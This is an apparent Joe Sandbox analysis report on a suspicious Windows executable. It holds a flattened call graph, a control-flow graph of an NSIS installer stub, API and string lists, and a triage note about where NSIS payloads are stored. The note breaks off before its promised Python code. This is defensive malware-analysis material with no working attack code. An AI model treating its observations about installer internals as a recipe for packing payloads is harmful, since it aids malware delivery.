3707->3709 3708->3547 3709->3707 3710->3542 3721 404bd7 3713->3721 3715 404c64 3717 404bd7 SendMessageA 3715->3717 3716 404c41 3716->3715 3718 403845 2 API calls 3716->3718 3719 404c81 OleUninitialize 3717->3719 3718->3716 3719->3580 3720->3704 3722 404be0 SendMessageA 3721->3722 3723 404c0a 3721->3723 3722->3723 3723->3716 3725 4049f4 3724->3725 3726 40435d 3725->3726 3727 4049f9 FreeLibrary GlobalFree 3725->3727 3728 4085b8 3726->3728 3727->3725 3729 40815b 17 API calls 3728->3729 3730 4085cf 3729->3730 3731 4085f3 3730->3731 3732 4085d6 DeleteFileA 3730->3732 3733 404371 OleUninitialize 3731->3733 3735 4087b6 3731->3735 3771 407cb6 lstrcpynA 3731->3771 3732->3733 3733->3435 3733->3436 3735->3733 3776 408123 FindFirstFileA 3735->3776 3736 408625 3738 408630 3736->3738 3739 408648 3736->3739 3779 407ce8 lstrcatA 3738->3779 3742 4078ce 2 API calls 3739->3742 3743 408644 3742->3743 3747 408671 lstrlenA FindFirstFileA 3743->3747 3780 407ce8 lstrcatA 
3743->3780 3744 407cf2 3 API calls 3745 4087e2 3744->3745 3746 407a46 2 API calls 3745->3746 3749 4087eb RemoveDirectoryA 3746->3749 3747->3735 3754 4086a7 3747->3754 3752 4087fa 3749->3752 3753 40882c 3749->3753 3751 4078a4 CharNextA 3751->3754 3752->3733 3756 408800 3752->3756 3755 406fcb 23 API calls 3753->3755 3754->3751 3761 40878f FindNextFileA 3754->3761 3765 4085b8 56 API calls 3754->3765 3767 408751 3754->3767 3768 406fcb 23 API calls 3754->3768 3772 407cb6 lstrcpynA 3754->3772 3773 407a46 GetFileAttributesA 3754->3773 3755->3733 3757 406fcb 23 API calls 3756->3757 3758 408810 3757->3758 3759 408311 39 API calls 3758->3759 3760 408822 3759->3760 3760->3733 3761->3754 3763 4087ac FindClose 3761->3763 3763->3735 3765->3754 3767->3754 3769 406fcb 23 API calls 3767->3769 3781 408311 3767->3781 3768->3754 3769->3767 3771->3736 3772->3754 3774 407a71 DeleteFileA 3773->3774 3775 407a5f SetFileAttributesA 3773->3775 3774->3754 3775->3774 3777 408155 3776->3777 3778 408146 FindClose 3776->3778 3777->3733 3777->3744 3778->3777 3782 408299 5 API calls 3781->3782 3783 40832c 3782->3783 3784 408345 3783->3784 3789 4085a8 3783->3789 3807 407a78 GetFileAttributesA CreateFileA 3783->3807 3785 4083b5 GetShortPathNameA 3784->3785 3784->3789 3788 4083d5 3785->3788 3785->3789 3787 40837d CloseHandle GetShortPathNameA 3787->3784 3787->3789 3788->3789 3790 4083e0 wsprintfA 3788->3790 3789->3767 3791 407e06 18 API calls 3790->3791 3792 408423 3791->3792 3808 407a78 GetFileAttributesA CreateFileA 3792->3808 3794 408441 3794->3789 3795 40844f GetFileSize GlobalAlloc 3794->3795 3796 408488 ReadFile 3795->3796 3797 40859e CloseHandle 3795->3797 3796->3797 3798 4084b3 3796->3798 3797->3789 3798->3797 3809 4079b4 lstrlenA 3798->3809 3801 4084d2 3814 407cb6 lstrcpynA 3801->3814 3802 4084ee 3804 4079b4 3 API calls 3802->3804 3805 4084e8 3804->3805 3806 408547 SetFilePointer WriteFile GlobalFree 3805->3806 3806->3797 3807->3787 3808->3794 3810 4079d4 3809->3810 3811 4079df lstrcmpiA 
3810->3811 3812 407a05 3810->3812 3811->3812 3813 407a09 CharNextA 3811->3813 3812->3801 3812->3802 3813->3810 3814->3805 3815->3608 4314 403376 4315 401456 18 API calls 4314->4315 4316 403394 4315->4316 4317 40339f SetFilePointer 4316->4317 4320 4033c9 4317->4320 4318 401456 18 API calls 4318->4320 4319 4037a0 4321 402a3c 4319->4321 4322 407e06 18 API calls 4319->4322 4320->4318 4320->4319 4320->4321 4322->4321 4323 4017f7 4324 402530 4323->4324 4327 407be3 wsprintfA 4324->4327 4326 40253c 4327->4326 4335 40247c GetDC GetDeviceCaps 4336 401456 18 API calls 4335->4336 4337 4024ad MulDiv 4336->4337 4338 401456 18 API calls 4337->4338 4339 4024d9 4338->4339 4340 407e06 18 API calls 4339->4340 4341 402520 CreateFontIndirectA 4340->4341 4342 40252f 4341->4342 4345 407be3 wsprintfA 4342->4345 4344 40253c 4345->4344 4346 40367d 4347 401456 18 API calls 4346->4347 4348 403689 4347->4348 4349 4036ae 4348->4349 4350 4036df 4348->4350 4355 402a3c 4348->4355 4351 4036b0 4349->4351 4352 4036ca 4349->4352 4353 403700 4350->4353 4354 4036eb 4350->4354 4362 407cb6 lstrcpynA 4351->4362 4352->4355 4359 401456 18 API calls 4352->4359 4360 4037a0 4352->4360 4357 407e06 18 API calls 4353->4357 4356 401456 18 API calls 4354->4356 4356->4355 4357->4355 4359->4352 4360->4355 4361 407e06 18 API calls 4360->4361 4361->4355 4362->4355 4363 401000 4364 401032 BeginPaint GetClientRect 4363->4364 4365 401017 DefWindowProcA 4363->4365 4367 401078 4364->4367 4370 401212 4365->4370 4368 401130 4367->4368 4369 401084 CreateBrushIndirect FillRect DeleteObject 4367->4369 4371 40113a CreateFontIndirectA 4368->4371 4372 4011db EndPaint 4368->4372 4369->4367 4371->4372 4373 401151 6 API calls 4371->4373 4372->4370 4373->4372 4381 401803 4382 40181c 4381->4382 4383 40180d ShowWindow 4381->4383 4384 40256d ShowWindow 4382->4384 4385 4037d4 4382->4385 4383->4382 4384->4385 4386 402583 4387 401400 18 API calls 4386->4387 4388 40258f 4387->4388 4389 401400 18 API calls 4388->4389 4390 40259e 4389->4390 4391 
401400 18 API calls 4390->4391 4392 4025ad 4391->4392 4393 401400 18 API calls 4392->4393 4394 4025bc 4393->4394 4395 40163b 23 API calls 4394->4395 4396 4025c9 ShellExecuteA 4395->4396 3827 401b06 3828 401400 18 API calls 3827->3828 3829 401b12 3828->3829 3830 401b2b 3829->3830 3831 401b3d 3829->3831 3872 407cb6 lstrcpynA 3830->3872 3873 407cb6 lstrcpynA 3831->3873 3834 401b3b 3838 407d37 5 API calls 3834->3838 3835 401b51 3836 407cf2 3 API calls 3835->3836 3837 401b5b 3836->3837 3874 407ce8 lstrcatA 3837->3874 3840 401b76 3838->3840 3841 408123 2 API calls 3840->3841 3858 401ba9 3840->3858 3843 401b88 3841->3843 3842 407a46 2 API calls 3842->3858 3845 401b91 CompareFileTime 3843->3845 3843->3858 3845->3858 3846 401cce 3848 406fcb 23 API calls 3846->3848 3847 401c05 3849 406fcb 23 API calls 3847->3849 3850 401cde 3848->3850 3852 401c15 3849->3852 3851 403d52 46 API calls 3850->3851 3853 401d08 3851->3853 3855 401d25 SetFileTime 3853->3855 3857 401d47 FindCloseChangeNotification 3853->3857 3854 407cb6 lstrcpynA 3854->3858 3855->3857 3856 407e06 18 API calls 3856->3858 3857->3852 3859 401d59 3857->3859 3858->3842 3858->3846 3858->3847 3858->3854 3858->3856 3864 407836 MessageBoxIndirectA 3858->3864 3868 401ca5 3858->3868 3871 407a78 GetFileAttributesA CreateFileA 3858->3871 3860 401d86 3859->3860 3861 401d5e 3859->3861 3863 407e06 18 API calls 3860->3863 3862 407e06 18 API calls 3861->3862 3865 401d72 3862->3865 3866 401d84 3863->3866 3864->3858 3875 407ce8 lstrcatA 3865->3875 3869 407836 MessageBoxIndirectA 3866->3869 3868->3852 3870 406fcb 23 API calls 3868->3870 3869->3852 3870->3852 3871->3858 3872->3834 3873->3835 4404 402008 4405 401456 18 API calls 4404->4405 4406 402016 4405->4406 4407 401456 18 API calls 4406->4407 4409 402025 4407->4409 4411 407be3 wsprintfA 4409->4411 4410 402332 4411->4410 4412 401f08 4413 401400 18 API calls 4412->4413 4414 401f14 4413->4414 4415 401400 18 API calls 4414->4415 4416 401f23 4415->4416 4417 401f34 lstrcmpiA 4416->4417 4418 
401f3c lstrcmpA 4416->4418 4419 401f42 4417->4419 4418->4419 4420 402988 4421 401400 18 API calls 4420->4421 4422 402994 4421->4422 4423 401400 18 API calls 4422->4423 4424 4029a7 4423->4424 4425 401400 18 API calls 4424->4425 4426 4029b6 4425->4426 4427 401400 18 API calls 4426->4427 4428 4029c9 4427->4428 4429 401400 18 API calls 4428->4429 4431 4029d8 4429->4431 4430 4029f9 CoCreateInstance 4433 402a2f 4430->4433 4439 402a46 4430->4439 4431->4430 4432 401400 18 API calls 4431->4432 4434 4029f8 4432->4434 4435 40163b 23 API calls 4433->4435 4434->4430 4437 402a3b 4435->4437 4436 402bc5 4438 40163b 23 API calls 4436->4438 4438->4437 4440 402b39 MultiByteToWideChar 4439->4440 4441 402b7c 4439->4441 4440->4441 4441->4433 4441->4436 4442 403089 4451 4015b0 4442->4451 4444 403095 4445 401456 18 API calls 4444->4445 4446 4030a4 4445->4446 4447 4030e5 RegEnumValueA 4446->4447 4448 4030c7 RegEnumKeyA 4446->4448 4449 402a3c 4446->4449 4447->4449 4450 40312b RegCloseKey 4447->4450 4448->4450 4450->4449 4452 401400 18 API calls 4451->4452 4453 4015cc RegOpenKeyExA 4452->4453 4453->4444 4455 40710b 4456 4073a5 4455->4456 4471 40712c 4455->4471 4457 407404 4456->4457 4458 4073ad GetDlgItem CreateThread CloseHandle 4456->4458 4459 40740c 4457->4459 4460 40744f 4457->4460 4461 4074ba 4458->4461 4462 407418 ShowWindow ShowWindow 4459->4462 4463 407449 4459->4463 4460->4461 4466 407473 ShowWindow 4460->4466 4476 407460 4460->4476 4461->4463 4468 4074cd SendMessageA 4461->4468 4503 404c96 SendMessageA 4462->4503 4464 404f0f 8 API calls 4463->4464 4467 407687 4464->4467 4469 407494 4466->4469 4466->4476 4468->4467 4470 4074fc CreatePopupMenu 4468->4470 4472 406fcb 23 API calls 4469->4472 4474 407e06 18 API calls 4470->4474 4501 404c96 SendMessageA 4471->4501 4472->4476 4473 404cc8 SendMessageA 4473->4461 4477 407518 AppendMenuA 4474->4477 4476->4473 4479 407540 GetWindowRect 4477->4479 4480 40755a 4477->4480 4478 4071b9 4482 4071c6 GetClientRect GetSystemMetrics SendMessageA 
SendMessageA 4478->4482 4481 407564 TrackPopupMenu 4479->4481 4480->4481 4481->4467 4483 40759e 4481->4483 4484 407247 SendMessageA SendMessageA 4482->4484 4485 40727f 4482->4485 4489 4075c4 SendMessageA 4483->4489 4490 4075ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4483->4490 4484->4485 4486 407285 SendMessageA 4485->4486 4487 4072a8 4485->4487 4486->4487 4488 404d65 18 API calls 4487->4488 4491 4072c5 4488->4491 4489->4483 4492 40762a SendMessageA 4490->4492 4493 4072d1 ShowWindow 4491->4493 4494 40731c SendMessageA 4491->4494 4492->4492 4495 407664 GlobalUnlock SetClipboardData CloseClipboard 4492->4495 4496 4072f4 ShowWindow 4493->4496 4497 407305 4493->4497 4494->4467 4500 407365 SendMessageA SendMessageA 4494->4500 4495->4467 4496->4497 4502 404c96 SendMessageA 4497->4502 4500->4467 4501->4478 4502->4494 4503->4463 4504 403491 4505 401400 18 API calls 4504->4505 4507 40349d 4505->4507 4506 4034b9 4509 407a46 2 API calls 4506->4509 4507->4506 4508 401400 18 API calls 4507->4508 4508->4506 4510 4034c2 4509->4510 4531 407a78 GetFileAttributesA CreateFileA 4510->4531 4512 4034db 4513 403500 GlobalAlloc 4512->4513 4514 4034e7 DeleteFileA 4512->4514 4516 403644 CloseHandle 4513->4516 4517 40352f 4513->4517 4515 403668 4514->4515 4520 40163b 23 API calls 4515->4520 4523 403677 4515->4523 4516->4514 4516->4515 4532 403b31 SetFilePointer 4517->4532 4519 40353b 4521 403ae9 ReadFile 4519->4521 4520->4523 4522 40354e GlobalAlloc 4521->4522 4524 40356b 4522->4524 4525 4035dd WriteFile GlobalFree 4522->4525 4527 403d52 46 API calls 4524->4527 4526 403d52 46 API calls 4525->4526 4528 40363f 4526->4528 4530 40358f 4527->4530 4528->4516 4529 4035d3 GlobalFree 4529->4525 4530->4529 4531->4512 4532->4519 3355 402613 3356 401400 18 API calls 3355->3356 3357 40261f 3356->3357 3358 406fcb 23 API calls 3357->3358 3359 402632 3358->3359 3371 407779 CreateProcessA 3359->3371 3361 4026b1 CloseHandle 3364 403677 3361->3364 3367 402a3c 3361->3367 3363 402656 
WaitForSingleObject 3365 40267b GetExitCodeProcess 3363->3365 3366 40263c 3363->3366 3364->3367 3365->3361 3369 402699 3365->3369 3366->3361 3366->3363 3366->3367 3374 408848 3366->3374 3378 407be3 wsprintfA 3369->3378 3372 4077f5 3371->3372 3373 4077e5 CloseHandle 3371->3373 3372->3366 3373->3372 3375 40885d PeekMessageA 3374->3375 3376 408881 DispatchMessageA 3375->3376 3377 40888d 3375->3377 3376->3375 3377->3366 3378->3361 3388 401714 3389 40171c 3388->3389 3392 403845 3389->3392 3394 403854 3392->3394 3393 40172e 3394->3393 3395 4038a0 MulDiv SendMessageA 3394->3395 3395->3394 4540 406614 GetDlgItem GetDlgItem 4541 406671 7 API calls 4540->4541 4546 4069d1 4540->4546 4542 406797 DeleteObject 4541->4542 4543 406777 SendMessageA 4541->4543 4544 4067b0 4542->4544 4543->4542 4549 40681b 4544->4549 4551 407e06 18 API calls 4544->4551 4545 406af3 4547 406b30 4545->4547 4548 406bf6 4545->4548 4546->4545 4550 406a56 4546->4550 4556 406557 4 API calls 4546->4556 4557 406b49 SendMessageA 4547->4557 4583 4069cb 4547->4583 4553 406c28 4548->4553 4554 406bff SendMessageA 4548->4554 4552 404d65 18 API calls 4549->4552 4550->4545 4560 406ad0 SendMessageA 4550->4560 4569 406c7a 4550->4569 4555 4067d9 SendMessageA SendMessageA 4551->4555 4558 40683e 4552->4558 4561 406c31 4553->4561 4553->4569 4554->4583 4555->4544 4556->4550 4562 406b7b SendMessageA 4557->4562 4557->4583 4563 404d65 18 API calls 4558->4563 4559 404f0f 8 API calls 4564 406eca 4559->4564 4560->4545 4565 406c44 4561->4565 4566 406c3a ImageList_Destroy 4561->4566 4568 406ba1 4562->4568 4573 40685d 4563->4573 4567 406c4d GlobalFree 4565->4567 4565->4583 4566->4565 4567->4583 4574 406bbf SendMessageA 4568->4574 4572 403903 2 API calls 4569->4572 4586 406caf 4569->4586 4591 406e5e 4569->4591 4570 406e73 ShowWindow GetDlgItem ShowWindow 4570->4583 4571 40696b 4575 406971 GetWindowLongA SetWindowLongA 4571->4575 4576 40699f 4571->4576 4572->4586 4573->4571 4579 4068b2 SendMessageA 4573->4579 4580 406902 SendMessageA 
4573->4580 4581 406926 SendMessageA 4573->4581 4574->4569 4575->4576 4577 4069c3 4576->4577 4578 4069a5 ShowWindow 4576->4578 4592 404c96 SendMessageA 4577->4592 4578->4577 4579->4573 4580->4573 4581->4573 4583->4559 4584 406e0a InvalidateRect 4585 406e31 4584->4585 4584->4591 4589 404da2 21 API calls 4585->4589 4587 406ced SendMessageA 4586->4587 4588 406d17 4586->4588 4587->4588 4588->4584 4590 406da4 SendMessageA SendMessageA 4588->4590 4589->4591 4590->4588 4591->4570 4591->4583 4592->4583 4593 40239a 4594 401456 18 API calls 4593->4594 4595 4023ae SetWindowLongA 4594->4595 4596 40382c 4595->4596 4597 402f9d 4598 4015b0 19 API calls 4597->4598 4599 402fa9 4598->4599 4600 401400 18 API calls 4599->4600 4601 402fbc 4600->4601 4602 402fd1 RegQueryValueExA 4601->4602 4603 402a3c 4601->4603 4604 403015 4602->4604 4605 403025 RegCloseKey 4602->4605 4604->4605 4608 407be3 wsprintfA 4604->4608 4605->4603 4608->4605 4609 401a9e 4610 401400 18 API calls 4609->4610 4611 401aaa SearchPathA 4610->4611 4612 402dab 4611->4612 4613 40319e 4614 4031c0 4613->4614 4615 4031a7 4613->4615 4617 401400 18 API calls 4614->4617 4616 401456 18 API calls 4615->4616 4619 4031b3 4616->4619 4618 4031cc 4617->4618 4623 407cde lstrlenA 4618->4623 4621 403831 4619->4621 4622 4031f8 WriteFile 4619->4622 4622->4621 4624 4097a6 4625 408cf0 4624->4625 4626 408a96 4624->4626 4626->4625 4627 408b69 GlobalAlloc 4626->4627 4628 408b4d GlobalFree 4626->4628 4629 408c55 GlobalAlloc 4626->4629 4630 408c45 GlobalFree 4626->4630 4627->4625 4627->4626 4628->4627 4629->4625 4629->4626 4630->4629 4631 402727 4632 401400 18 API calls 4631->4632 4633 402733 4632->4633 4634 408299 5 API calls 4633->4634 4635 402746 4634->4635 4636 40277c GlobalAlloc 4635->4636 4640 402a3c 4635->4640 4637 402799 4636->4637 4636->4640 4638 408299 5 API calls 4637->4638 4639 4027a5 4638->4639 4641 408299 5 API calls 4639->4641 4644 4027b8 4641->4644 4642 4027e5 GlobalFree 4642->4640 4644->4642 4648 407be3 wsprintfA 4644->4648 4646 
40282d 4649 407be3 wsprintfA 4646->4649 4648->4646 4649->4642 4657 402ca8 4658 402101 4657->4658 4661 402127 4657->4661 4659 407e06 18 API calls 4658->4659 4660 402115 4659->4660 4662 407836 MessageBoxIndirectA 4660->4662 4662->4661 4663 401e29 4664 401400 18 API calls 4663->4664 4665 401e35 4664->4665 4670 407cde lstrlenA 4665->4670 4671 40342b 4672 401400 18 API calls 4671->4672 4673 403437 FindFirstFileA 4672->4673 4674 40346b 4673->4674 4678 403452 4673->4678 4679 407be3 wsprintfA 4674->4679 4676 40347d 4680 407cb6 lstrcpynA 4676->4680 4679->4676 4680->4678 4681 405bab 4682 405bc1 4681->4682 4683 405be9 4681->4683 4691 407805 GetDlgItemTextA 4682->4691 4684 405c39 4683->4684 4685 405bee SHGetPathFromIDListA 4683->4685 4687 405c04 4685->4687 4688 405bd1 SendMessageA 4685->4688 4690 403903 2 API calls 4687->4690 4688->4684 4690->4688 4691->4688 3900 40322e 3901 401456 18 API calls 3900->3901 3902 40323c 3901->3902 3903 4032d8 3902->3903 3904 40326b ReadFile 3902->3904 3905 4032bf 3902->3905 3908 4032ef 3902->3908 3904->3902 3904->3903 3909 407be3 wsprintfA 3905->3909 3907 4032fb SetFilePointer 3907->3903 3908->3903 3908->3907 3909->3903 4692 4020ae 4693 401400 18 API calls 4692->4693 4694 4020ba 4693->4694 4695 401456 18 API calls 4694->4695 4696 4020c9 wsprintfA 4695->4696 4697 40382f 4696->4697 4698 401db0 4699 401e0c 4698->4699 4700 401400 18 API calls 4699->4700 4701 401e11 4700->4701 4702 4085b8 63 API calls 4701->4702 4703 401e24 4702->4703 4704 402d34 4705 401400 18 API calls 4704->4705 4706 402d4a 4705->4706 4707 401400 18 API calls 4706->4707 4708 402d59 4707->4708 4709 401400 18 API calls 4708->4709 4710 402d6c GetPrivateProfileStringA 4709->4710 4711 402dab 4710->4711 4712 4057b5 4713 4057d0 4712->4713 4714 40597b 4712->4714 4717 404d65 18 API calls 4713->4717 4715 405987 4714->4715 4716 405a0b 4714->4716 4723 4059b0 GetDlgItem SendMessageA 4715->4723 4738 405a06 4715->4738 4718 405a14 GetDlgItem 4716->4718 4716->4738 4719 40583a 4717->4719 4720 405b02 
4718->4720 4721 405a37 4718->4721 4724 404d65 18 API calls 4719->4724 4725 405b14 4720->4725 4720->4738 4721->4720 4728 405a65 SendMessageA 4721->4728 4722 404f0f 8 API calls 4729 405b9a 4722->4729 4749 404d44 EnableWindow 4723->4749 4727 405857 CheckDlgButton 4724->4727 4730 405b43 4725->4730 4731 405b1a SendMessageA 4725->4731 4746 404d44 EnableWindow 4727->4746 4737 405aa2 SetCursor ShellExecuteA 4728->4737 4730->4729 4734 405b4e SendMessageA 4730->4734 4731->4730 4732 405a00 4750 404d05 SendMessageA 4732->4750 4734->4729 4736 405880 GetDlgItem 4747 404c96 SendMessageA 4736->4747 4741 405afa SetCursor 4737->4741 4738->4722 4740 4058a1 SendMessageA 4742 4058e0 SendMessageA SendMessageA 4740->4742 4743 4058d4 GetSysColor 4740->4743 4741->4720 4748 407cde lstrlenA 4742->4748 4743->4742 4746->4736 4747->4740 4749->4732 4750->4738 4751 402db6 4752 402e00 4751->4752 4753 402dbf 4751->4753 4754 401400 18 API calls 4752->4754 4755 4015b0 19 API calls 4753->4755 4756 402e0c 4754->4756 4757 402dcb 4755->4757 4762 401482 RegOpenKeyExA 4756->4762 4758 401400 18 API calls 4757->4758 4761 402a3c 4757->4761 4760 402de2 RegDeleteValueA RegCloseKey 4758->4760 4760->4761 4768 401561 4762->4768 4769 4014ca 4762->4769 4763 401540 RegCloseKey 4764 408299 5 API calls 4763->4764 4766 40155c 4764->4766 4765 401511 RegCloseKey 4765->4768 4766->4768 4770 40158f RegDeleteKeyA 4766->4770 4767 401482 5 API calls 4767->4769 4768->4761 4769->4763 4769->4765 4769->4767 4770->4768 4771 401737 4772 406fcb 23 API calls 4771->4772 4773 401747 4772->4773 4774 401fb8 4775 401456 18 API calls 4774->4775 4776 401fc4 4775->4776 4777 401456 18 API calls 4776->4777 4778 401fd3 4777->4778 4779 402339 4780 401456 18 API calls 4779->4780 4781 402345 IsWindow 4780->4781 4782 402354 4781->4782 4783 401db9 4784 401400 18 API calls 4783->4784 4785 401dc5 4784->4785 4786 407836 MessageBoxIndirectA 4785->4786 4787 401dd8 4786->4787 4788 40183b 4789 401400 18 API calls 4788->4789 4790 401847 SetFileAttributesA 
4789->4790 4791 401aff 4790->4791 4792 40573f 4793 405759 4792->4793 4799 405792 4792->4799 4794 404d65 18 API calls 4793->4794 4796 405770 4794->4796 4795 404f0f 8 API calls 4797 4057a8 4795->4797 4800 4077fb SetDlgItemTextA 4796->4800 4799->4795 4801 402cbf 4802 402cc5 4801->4802 4805 402cd1 4801->4805 4803 401400 18 API calls 4802->4803 4803->4805 4804 402ceb 4807 401400 18 API calls 4804->4807 4809 402d05 4804->4809 4805->4804 4806 401400 18 API calls 4805->4806 4806->4804 4807->4809 4808 401400 18 API calls 4810 402d14 WritePrivateProfileStringA 4808->4810 4809->4808 4811 402d2d 4810->4811

Control-flow Graph

• Executed
• Not Executed

control_flow_graph 0 404375-404399 SetErrorMode GetVersion 1 4043b6 0->1 2 40439b-4043aa call 408299 0->2 4 4043bb-4043be 1->4 2->1 9 4043ac-4043b5 2->9 6 4043c0-4043c3 call 40820e 4->6 7 4043d9-404492 call 408299 * 2 InitCommonControls OleInitialize SHGetFileInfoA call 407cb6 GetCommandLineA call 407cb6 GetModuleHandleA 4->7 12 4043c8-4043d7 lstrlenA 6->12 20 404494-404499 7->20 21 40449e-4044b8 call 4078a4 CharNextA 7->21 9->1 12->4 20->21 24 4044be-4044c1 21->24 25 404560-40457e GetTempPathA call 4042bc 24->25 26 4044c7-4044cc 24->26 33 404580-40459f DeleteFileA call 403f03 25->33 34 4045a7-4045db GetWindowsDirectoryA call 407ce8 call 4042bc 25->34 27 4044d1-4044d9 26->27 28 4044ce-4044cf 26->28 30 4044e1-4044e4 27->30 31 4044db-4044dc 27->31 28->26 35 404543-40455b call 4078a4 30->35 36 4044e6-4044ed 30->36 31->30 47 4045a5-4045ee 33->47 48 404817-404824 call 404316 OleUninitialize 33->48 34->33 58 4045dd-4045e2 34->58 35->24 38 404500-404507 36->38 39 4044ef-4044fd 36->39 43 404509-404517 38->43 44 40451a-404521 38->44 39->38 43->44 49 404541 44->49 50 404523-40453f call 407cb6 44->50 59 404802-40480c call 4060fd 47->59 60 4045f4-404609 call 4078a4 47->60 62 404844-40484b 48->62 63 404826-40483f call 407836 48->63 49->35 50->25 64 404815 58->64 66 404811-404813 59->66 74 40460a-40460f 60->74 68 404851-40488e call 408299 * 3 62->68 69 40499e-4049a9 62->69 71 4049ac ExitProcess 63->71 64->48 66->48 94 404933-404942 call 408299 68->94 95 404894-40489b 68->95 69->71 76 404611-404617 74->76 77 404662-404681 call 4082eb call 407ce8 74->77 79 404619-40461a 76->79 80 40461c-40462d call 40815b 76->80 92 404683-404698 call 407ce8 77->92 93 404699-4046c8 call 407ce8 lstrcmpiA 77->93 79->74 89 404639-40465d call 407cb6 * 2 80->89 90 40462f-404634 80->90 89->59 90->64 92->93 93->90 108 4046ce-4046d7 93->108 106 404961-40498f 94->106 107 404944-40495d ExitWindowsEx 94->107 95->94 99 4048a1-4048c3 GetCurrentProcess 95->99 99->94 115 4048c5-404930 99->115 106->107 111 404991-40499d call 403903 106->111 107->111 112 40495f 107->112 113 4046e0 call 40774b 108->113 114 4046d9-4046de call 4076b0 108->114 111->69 112->69 123 4046e5-4046fb SetCurrentDirectoryA 113->123 114->123 115->94 124 404713-404735 call 407cb6 123->124 125 4046fd-404712 call 407cb6 123->125 131 40473e-404767 call 407e06 DeleteFileA 124->131 125->124 134 404769-40478b CopyFileA 131->134 135 4047dd-4047e4 131->135 134->135 137 40478d-4047cf call 408311 call 407e06 call 407779 134->137 135->131 136 4047ea-404800 call 408311 135->136 136->64 137->135 146 4047d1-4047dc CloseHandle 137->146 146->135
APIs

• SetErrorMode.KERNEL32 ref: 00404388
• GetVersion.KERNEL32 ref: 0040438F
• lstrlenA.KERNEL32 ref: 004043CC
• InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
• OleInitialize.OLE32 ref: 00404405
• SHGetFileInfoA.SHELL32 ref: 0040443A
• GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404478
• CharNextA.USER32 ref: 004044B1
  • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
  • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
• GetTempPathA.KERNEL32(00000001,00000001), ref: 0040456F
• DeleteFileA.KERNEL32 ref: 0040458D
• GetWindowsDirectoryA.KERNEL32 ref: 004045B6
                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 0040481C
                                                                                                                            • ExitProcess.KERNEL32 ref: 004049AC
                                                                                                                              • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00000000,?,00000000), ref: 004048A1
                                                                                                                            • ExitWindowsEx.USER32 ref: 00404953
                                                                                                                              • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                              • Part of subcall function 004060FD: lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                              • Part of subcall function 004060FD: GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CharExitHandleModuleNextProcessWindows$AddressAttributesCommandCommonControlsCurrentDeleteDirectoryErrorInfoInitInitializeLineModePathProcTempUninitializeVersionlstrcmpilstrcpynlstrlen
                                                                                                                            • String ID: /D=$ _?=$"C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe" $%$($62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$8_o$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Software Setup$UXTHEME
                                                                                                                            • API String ID: 3796326152-2673972989
                                                                                                                            • Opcode ID: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                            • Instruction ID: 1612ab991b91f7509b6110098b19e500dbf275244ae378e5724325f5e1753ea3
                                                                                                                            • Opcode Fuzzy Hash: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
                                                                                                                            • Instruction Fuzzy Hash: 34F143F0908300AFD720AF65D94876BBBE4EF85704F41887EE5C8A7291D77C58458B6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
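Triage note and added example (not part of the Joe Sandbox report and not code from the sample): the strings referenced by function 00404375 above ("NSIS Software Setup", "Error launching installer", "Error writing temporary file. Make sure your temp folder is valid.", "/D=", "_?=", "NCRC", "UXTHEME") together with the SetErrorMode / GetVersion / InitCommonControls / OleInitialize / SHGetFileInfoA / GetCommandLineA / GetTempPathA prologue are the standard NSIS installer stub (exehead), and the cleanup of C:\Users\user\AppData\Local\Temp\nsiC1CE.tmp\*.* in the next function is consistent with the ns?XXXX.tmp plugin directory NSIS creates under %TEMP%. The code in this memory dump is therefore the generic NSIS bootstrap rather than payload logic; the payload sits in the data block that makensis appends after the stub. The Python below locates that block's "firstheader" record in a PE image and decodes it, and models which way the stub's CRC check goes when the /NCRC switch (the "NCRC" string above) is passed. Signature, record layout and flag bits are from NSIS Source/exehead/fileform.h; the CRC-switch rule is my reading of the exehead source and should be checked against it; the installer image used as input is constructed inline and is not a 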